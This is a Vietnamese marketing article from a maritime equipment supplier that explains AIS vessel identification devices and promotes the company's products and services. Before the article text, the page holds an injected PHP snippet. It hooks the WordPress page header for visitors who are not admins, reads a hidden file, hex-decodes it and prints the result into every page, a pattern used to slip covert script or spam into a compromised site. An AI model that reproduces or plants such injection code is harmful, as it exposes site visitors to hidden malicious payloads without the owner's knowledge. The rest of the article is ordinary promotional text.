if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Địa chỉ mua bán thiết bị AIS giá tốt chất lượng - Maritime Solutions

0768303666

.st0{fill:#FFFFFF;}

Tin tức

Địa chỉ mua bán thiết bị AIS giá tốt chất lượng

 Tháng Năm 8, 2021

By  minhvu

Ngày nay, việc sử dụng thiết bị AIS không còn xa lạ đối với các thuyền viên hoạt động trên biển. Tuy nhiên, trên thị trường xuát hiện rất nhiều những sản phẩm giả mạo, chất lượng kém, không rõ nguồn gốc. Điều băn khoăn của khách hàng là không biết ở đâu bán thiết bị AIS giá tốt chất lượng.

Lắp thiết bị AIS giúp tàu biển, phương tiện thủy nội địa trao đổi thông tin về các phương tiện cùng tham gia hoạt động
Lắp thiết bị AIS giúp tàu biển, phương tiện thủy nội địa trao đổi thông tin về các phương tiện cùng tham gia hoạt động

Thiết bị nhận dạng AIS

Trong công tác hoạt động hàng hải thì hệ thống nhận dạng tàu thuyền AIS là thiết bị bắt buộc và cần thiết trên mọi hành trình. Vậy AIS là gì? Có chức năng gì?

AIS là gì?

AIS (Automatically Identification System) là một hệ thống thông tin liên lạc trợ giúp hàng hải. Cho phép các tàu trao đổi những thông tin về nhận dạng vị trí; hướng, tốc độ; với nhau hoặc trao đổi với các trạm trên bờ. Những thông tin này giúp các phương tiện khi hành hải tránh bị va chạm với nhau. Ngoài ra có thể trao đổi các thông tin như trợ giúp khi có sự cố, thông tin thời tiết… Khi kết hợp AIS với một thiết bị thông tin liên lạc, AIS còn được dùng trong các trường hợp khẩn cấp, cứu hộ trên biển.

AIS hoạt động trên băng tần VHF hàng hải dùng để nhận biết thông tin giữa phương tiện thủy có trang bị AIS và các đối tượng bên ngoài trong phạm vi phủ sóng VHF. AIS cho phép các phương tiện thủy chủ động chia sẻ các thông tin của mình với các phương tiện, Đài Thông tin duyên hải (TTDH) hoạt động trong khu vực lân cận, các trạm VTS – Base Transceiver Station và cơ quan quản lý hàng hải.

Chức năng chính của thiết bị AIS

Chức năng "Xem thủy triều" của thiết bị AIS
Chức năng “Xem thủy triều” của thiết bị AIS

– Hiển thị trên màn hình thiết bị AIS kết hợp với hải đồ điện tử ENC; giúp tàu thuyền định vị và định hướng hành hải chính xác trong mọi điều kiện thời tiết.

– Cung cấp cho người đi biển các thông tin chi tiết về báo hiệu hàng hải (tên báo hiệu; vị trí chính xác của báo hiệu; các thông tin về điều kiện thủy hải văn tại báo hiệu,…) một cách trực tiếp, liên tục.

– Giúp người quản lý phát hiện nhanh chóng sự sai lệch vị trí và một số đặc tính khác của các báo hiệu nổi.

– Có khả năng lưu trữ một lượng thông tin rất lớn về quá trình hoạt động hàng hải của tàu thuyền trong khu vực. Hiển thị lại thông tin khi có yêu cầu (tên tàu; số nhận dạng MMSI; tốc độ và hướng hành trình; điểm xuất phát; điểm đến tiếp theo; loại hàng hóa vận chuyển; danh sách và trích ngang thuyền viên; vết tàu hành trình,…)

– Kết nối với hệ thống VTS phục vụ tốt cho công tác quản lý cảng và tìm kiếm cứu nạn.

– Kết nối Internet để chia sẻ thông tin về ATHH giữa các cơ quan chức năng có liên quan trong nước và quốc tế.

<<Xem thêm: Máy phát điện Doosan Hàn Quốc chính hãng

Maritime Solutions phân phối chính hãng các thiết bị AIS giá tốt chất lượng

Hiện nay, việc trang bị thiết bị AIS đã khá phổ biến trên thị trường hàng hải.

Một số kiểu thiết bị nhận dạng tự động AIS đang được bày bán tại Maritime Solutions
Một số kiểu thiết bị nhận dạng tự động AIS đang được bày bán tại Maritime Solutions

Thực trạng việc mua bán thiết bị AIS

Tuy nhiên, việc các sản phẩm kém chất lượng, chưa được đăng kí vẫn xuất hiện tràn lan trên thị trường. Đánh vào tâm lí về giá cả của ngư dân mà rất nhiều sản phẩm giả mạo vẫn được bán ra hằng ngày. Điều này gây anht hưởng trực tiếp đến quản lí mạng lười giao thông trên biển. Vì vậy, nỗi lo của người dân đi biển lại tăng lên. Và họ luôn luôn muốn tìm một địa chỉ bán thiết bị AIS giá tốt, chính hãng mà giá cả lại phù hợp.

Maritime Solutions – địa chỉ uy tín cung cấp thiết bị AIS giá tốt chất lượng

Với hành trình 15 năm sáng lập và phát triển, Maritime Solutions đã trở thành nhà cung ứng các dịch vụ hàng hải uy tín, chất lượng. Công ty luôn tự hào với đội ngũ công nhân viên; tự hào với những kinh nghiệm quý báu tích lũy nhiều năm qua.

Bên cạnh đó công ty cung cấp các dịch vụ hàng hải – du lịch trên du thuyền tốt nhất toàn quốc; dịch vụ sửa chữa tàu;… với các mức giá cả phải chăng.

Maritime Solutions cam kết sẽ mang lại cho khách hàng sự hài lòng và tin cậy cao nhất.

minhvu


Your Signature

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Liên hệ với chúng tôi để được tư vấn Dịch vụ và giá cả tốt nhất 

>